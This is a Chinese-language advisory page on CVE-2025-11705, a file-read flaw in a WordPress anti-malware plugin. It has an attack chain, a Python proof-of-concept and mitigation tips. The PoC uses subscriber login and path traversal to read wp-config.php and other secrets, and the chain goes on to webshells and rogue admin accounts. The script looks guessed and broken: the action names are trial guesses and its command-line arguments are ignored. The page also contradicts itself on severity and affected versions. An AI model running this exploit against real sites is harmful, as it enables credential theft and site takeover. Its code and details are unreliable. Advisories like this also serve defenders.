CVE-2025-11705: WordPress Anti-Malware插件任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2025-11705

漏洞类型

任意文件读取

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Anti-Malware Security and Brute-Force Firewall (WordPress插件)

漏洞概述

CVE-2025-11705是WordPress的Anti-Malware Security and Brute-Force Firewall插件中的一个高危安全漏洞。该漏洞存在于所有版本直至4.23.81版本，由于多个GOTMLS_* AJAX操作中缺少权限检查以及信息暴露问题，导致具有订阅者(Subscriber)级别访问权限及以上的认证用户可以利用此漏洞读取服务器上的任意文件内容。攻击者可通过构造特定的AJAX请求，结合目录遍历技术，访问敏感文件如wp-config.php、数据库配置文件、.htaccess等，从而获取数据库凭证、API密钥、加密盐值等敏感信息。该漏洞的CVSS评分为6.5，属于中等严重程度，但由于其利用门槛较低（只需订阅者权限），且可导致机密性信息泄露，对WordPress站点安全构成实质性威胁。攻击成功后，攻击者可利用获取的凭证进行进一步攻击，如数据库注入、恶意代码植入或完全接管网站。

技术细节

该漏洞的根本原因在于Anti-Malware插件的GOTMLS_* AJAX处理函数缺少WordPress capability检查。正常情况下，敏感操作应验证用户是否具有manage_options权限，但该插件仅检查用户是否已登录（Subscriber级别即可）。攻击者可通过以下步骤利用：首先，攻击者需要拥有一个WordPress订阅者账户或通过其他方式获取有效的认证cookie。然后，攻击者构造包含文件路径参数的AJAX请求到admin-ajax.php端点，目标是GOTMLS_*相关的AJAX动作。由于缺少权限验证，服务器会处理请求并返回文件内容。攻击者可使用目录遍历技术（如../../../../）访问webroot之外的文件。常见的攻击目标包括：wp-config.php（数据库凭证）、/etc/passwd（用户枚举）、其他插件/主题的配置文件等。漏洞影响所有使用该插件且版本低于4.23.81的WordPress站点。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标WordPress站点是否安装并启用Anti-Malware Security and Brute-Force Firewall插件，可通过扫描wp-content/plugins/目录或检查页面源代码识别

STEP 2

步骤2: 获取认证访问

攻击者注册为WordPress站点的订阅者用户，或通过社会工程学、XSS等其他手段获取有效的用户会话cookie

STEP 3

步骤3: 构造恶意请求

攻击者构造针对GOTMLS_* AJAX端点的POST请求，包含目标文件路径参数，可使用目录遍历技术（如../../../../）访问服务器任意文件

STEP 4

步骤4: 发送漏洞利用请求

使用获取的认证cookie发送恶意AJAX请求到wp-admin/admin-ajax.php，由于缺少权限检查，服务器会处理请求并返回文件内容

STEP 5

步骤5: 敏感信息提取

攻击者获取wp-config.php等敏感文件内容，提取数据库凭证、API密钥、WordPress盐值等关键信息

STEP 6

步骤6: 权限提升与持久化

利用获取的凭证连接数据库或直接修改WordPress配置，植入恶意代码、上传webshell或创建管理员账户，实现完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11705 PoC - WordPress Anti-Malware Plugin Arbitrary File Read
# Requires: Subscriber-level access or higher

import requests
import sys
from urllib.parse import urlencode

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"

def get_auth_cookie():
    """Login and get authentication cookie"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    return session.cookies.get_dict()

def exploit_file_read(cookies, filepath):
    """Read arbitrary file via vulnerable AJAX endpoint"""
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Try different GOTMLS AJAX actions
    actions = ['GOTMLS_settings', 'GOTMLS_scan', 'GOTMLS_update']
    
    for action in actions:
        data = {
            'action': action,
            'GOTMLS_path': filepath  # File path to read
        }
        
        try:
            response = requests.post(
                ajax_url,
                data=data,
                cookies=cookies
            )
            
            if response.status_code == 200 and len(response.text) > 0:
                print(f"[+] Success with action: {action}")
                print(f"[+] File: {filepath}")
                print("=" * 50)
                print(response.text)
                print("=" * 50)
                return response.text
        except Exception as e:
            print(f"[-] Error with {action}: {e}")
    
    return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11705.py <target_url> <username> <password> [filepath]")
        print("Example: python cve-2025-11705.py http://example.com attacker password ../../wp-config.php")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    filepath = sys.argv[4] if len(sys.argv) > 4 else "../../wp-config.php"
    
    print(f"[*] Logging in as {username}...")
    cookies = get_auth_cookie()
    
    if not cookies:
        print("[-] Failed to authenticate")
        sys.exit(1)
    
    print("[*] Attempting to read file...")
    exploit_file_read(cookies, filepath)

if __name__ == "__main__":
    main()

影响范围

Anti-Malware Security and Brute-Force Firewall < 4.23.81

防御指南

临时缓解措施

临时缓解措施：1) 禁用或删除Anti-Malware Security and Brute-Force Firewall插件，使用替代安全解决方案；2) 限制wp-admin目录访问，仅允许特定IP访问管理后台；3) 在Web服务器层面添加规则，阻止包含GOTMLS_和路径遍历字符的请求；4) 审查并移除不必要的用户账户，特别是高权限账户；5) 启用WordPress的自动更新功能，确保安全补丁及时应用；6) 实施双因素认证(2FA)，防止凭证被盗用后被利用。